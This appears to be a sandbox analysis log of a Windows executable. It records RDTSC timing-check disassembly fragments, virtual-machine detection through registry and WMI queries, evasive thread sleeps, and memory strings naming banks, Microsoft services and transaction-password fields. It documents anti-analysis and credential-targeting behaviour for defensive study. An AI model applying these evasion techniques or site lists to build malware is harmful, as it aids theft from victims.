            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4068 second address: 5A4071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A41F9 second address: 5A420E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 jns 00007F45D50449AEh 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A437C second address: 5A4396 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007F45D5047A35h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4396 second address: 5A43A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A454E second address: 5A4553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5A4553 second address: 5A455D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F45D50449A6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACE12 second address: 5ACE1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F45D5047A26h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB156 second address: 5AB161 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F45D50449A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB566 second address: 5AB56A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB56A second address: 5AB576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F45D50449A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5AB86D second address: 5AB873 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ABE16 second address: 5ABE2E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F45D50449B2h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACC87 second address: 5ACCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F45D5047A26h 0x0000000a pop ecx 0x0000000b jmp 00007F45D5047A2Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACCA1 second address: 5ACCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5ACCA7 second address: 5ACCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A6C second address: 5B0A72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A72 second address: 5B0A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A76 second address: 5B0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F45D50449B0h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B0A90 second address: 5B0AA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44CE second address: 5B44EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F45D50449AFh 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B44EB second address: 5B44F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F45D5047A26h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B465C second address: 5B4662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4662 second address: 5B4668 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4668 second address: 5B4674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B47D3 second address: 5B47D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B47D7 second address: 5B480A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F45D50449B2h 0x0000000c pop edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jns 00007F45D50449A6h 0x00000016 jmp 00007F45D50449B1h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B480A second address: 5B4816 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B4816 second address: 5B481A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B624D second address: 5B6253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5B6253 second address: 5B6281 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F45D50449A6h 0x00000008 jp 00007F45D50449A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jno 00007F45D50449AEh 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 pushad 0x0000001a js 00007F45D50449A6h 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C4950 second address: 5C496C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F45D5047A26h 0x0000000a jmp 00007F45D5047A30h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8A8F second address: 5C8AA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B5h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5C8AA9 second address: 5C8ACD instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F45D5047A39h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F45D5047A31h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA664 second address: 5CA66A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA66A second address: 5CA66E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA66E second address: 5CA694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F45D50449B8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F45D50449B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5CA694 second address: 5CA6AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F45D5047A26h 0x0000000a jmp 00007F45D5047A2Eh 0x0000000f push ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E3 second address: 4DA04E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA04E7 second address: 4DA0504 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05E0 second address: 4DA05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05E6 second address: 4DA05EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA05EA second address: 4DA061C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F45D5047A35h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA061C second address: 4D90D80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449B7h 0x00000009 and esi, 380D90FEh 0x0000000f jmp 00007F45D50449B9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 je 00007F46473329A1h 0x0000001e xor eax, eax 0x00000020 jmp 00007F45D501E0DAh 0x00000025 pop esi 0x00000026 pop edi 0x00000027 pop ebx 0x00000028 leave 0x00000029 retn 0004h 0x0000002c nop 0x0000002d cmp eax, 00000000h 0x00000030 setne cl 0x00000033 xor ebx, ebx 0x00000035 test cl, 00000001h 0x00000038 jne 00007F45D50449A7h 0x0000003a jmp 00007F45D5044ACAh 0x0000003f call 00007F45D9A71887h 0x00000044 mov edi, edi 0x00000046 jmp 00007F45D50449B3h 0x0000004b xchg eax, ebp 0x0000004c push eax 0x0000004d push edx 0x0000004e jmp 00007F45D50449B5h 0x00000053 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90D80 second address: 4D90E26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F45D5047A31h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 pushfd 0x00000013 jmp 00007F45D5047A33h 0x00000018 and ch, FFFFFFFEh 0x0000001b jmp 00007F45D5047A39h 0x00000020 popfd 0x00000021 pop ecx 0x00000022 mov edx, 6CF60374h 0x00000027 popad 0x00000028 mov ebp, esp 0x0000002a pushad 0x0000002b mov edx, 6CFA4D0Ch 0x00000030 jmp 00007F45D5047A35h 0x00000035 popad 0x00000036 xchg eax, ecx 0x00000037 pushad 0x00000038 mov dx, ax 0x0000003b mov cx, 9A1Fh 0x0000003f popad 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F45D5047A37h 0x0000004a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E26 second address: 4D90E2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D90E2A second address: 4D90E30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C58 second address: 4DA0C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0C5E second address: 4DA0CB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F45D5047A2Eh 0x0000000f call 00007F464732C912h 0x00000014 push 77082B70h 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov eax, dword ptr [esp+10h] 0x00000024 mov dword ptr [esp+10h], ebp 0x00000028 lea ebp, dword ptr [esp+10h] 0x0000002c sub esp, eax 0x0000002e push ebx 0x0000002f push esi 0x00000030 push edi 0x00000031 mov eax, dword ptr [770E4538h] 0x00000036 xor dword ptr [ebp-04h], eax 0x00000039 xor eax, ebp 0x0000003b push eax 0x0000003c mov dword ptr [ebp-18h], esp 0x0000003f push dword ptr [ebp-08h] 0x00000042 mov eax, dword ptr [ebp-04h] 0x00000045 mov dword ptr [ebp-04h], FFFFFFFEh 0x0000004c mov dword ptr [ebp-08h], eax 0x0000004f lea eax, dword ptr [ebp-10h] 0x00000052 mov dword ptr fs:[00000000h], eax 0x00000058 ret 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov cl, dl 0x0000005e pushfd 0x0000005f jmp 00007F45D5047A36h 0x00000064 sbb ax, 5498h 0x00000069 jmp 00007F45D5047A2Bh 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DA0CB9 second address: 4DA0D09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esi, esi 0x0000000b jmp 00007F45D50449B7h 0x00000010 mov dword ptr [ebp-1Ch], esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F45D50449B5h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09AA second address: 4DB09B9 instructions: 0x00000000 rdtsc 0x00000002 mov dx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09B9 second address: 4DB09BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09BD second address: 4DB09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB09C3 second address: 4DB0A05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F45D50449AEh 0x00000008 pop eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F45D50449AEh 0x00000014 or ch, 00000038h 0x00000017 jmp 00007F45D50449ABh 0x0000001c popfd 0x0000001d mov esi, 6ADD7F6Fh 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A05 second address: 4DB0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A09 second address: 4DB0A0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0A0F second address: 4DB0AB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 857Bh 0x00000007 mov dh, ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F45D5047A39h 0x00000015 xor si, FD36h 0x0000001a jmp 00007F45D5047A31h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F45D5047A30h 0x00000026 sbb ah, 00000058h 0x00000029 jmp 00007F45D5047A2Bh 0x0000002e popfd 0x0000002f popad 0x00000030 xchg eax, esi 0x00000031 jmp 00007F45D5047A36h 0x00000036 push eax 0x00000037 jmp 00007F45D5047A2Bh 0x0000003c xchg eax, esi 0x0000003d jmp 00007F45D5047A36h 0x00000042 mov esi, dword ptr [ebp+0Ch] 0x00000045 pushad 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0AB1 second address: 4DB0B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, CBA9h 0x00000008 popad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F45D50449B4h 0x00000010 add cl, 00000078h 0x00000013 jmp 00007F45D50449ABh 0x00000018 popfd 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d test esi, esi 0x0000001f pushad 0x00000020 movzx ecx, dx 0x00000023 popad 0x00000024 je 00007F4647312273h 0x0000002a jmp 00007F45D50449B8h 0x0000002f cmp dword ptr [770E459Ch], 05h 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B15 second address: 4DB0B32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D5047A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B32 second address: 4DB0B8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F45D50449B7h 0x00000009 sbb cx, 3AAEh 0x0000000e jmp 00007F45D50449B9h 0x00000013 popfd 0x00000014 mov cx, E337h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F464732A2CAh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007F45D50449AFh 0x00000029 pop ecx 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B8F second address: 4DB0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F45D5047A2Bh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4DB0B9E second address: 4DB0BE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F45D50449B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c pushad 0x0000000d mov di, cx 0x00000010 movzx esi, bx 0x00000013 popad 0x00000014 push eax 0x00000015 pushad 0x00000016 push ecx 0x00000017 movsx ebx, si 0x0000001a pop eax 0x0000001b mov di, 592Ch 0x0000001f popad 0x00000020 xchg eax, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F45D50449AEh 0x00000028 rdtsc
            Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 52BFCA instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
            Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
            Source: C:\Users\user\Desktop\file.exe TID: 7908 Thread sleep time: -150000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe TID: 7908 Thread sleep time: -30000s >= -30000s
            Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696501413o
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696501413j
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696501413x
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: file.exe, 00000000.00000002.1546637487.0000000000F01000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW!
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696501413s
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397497517.00000000056CD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: file.exe, 00000000.00000002.1546637487.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWxC
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696501413
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696501413t
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactiveuserers.comVMware20,11696501413
            Source: file.exe, 00000000.00000002.1546067102.0000000000508000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1397634771.00000000057A2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696501413f
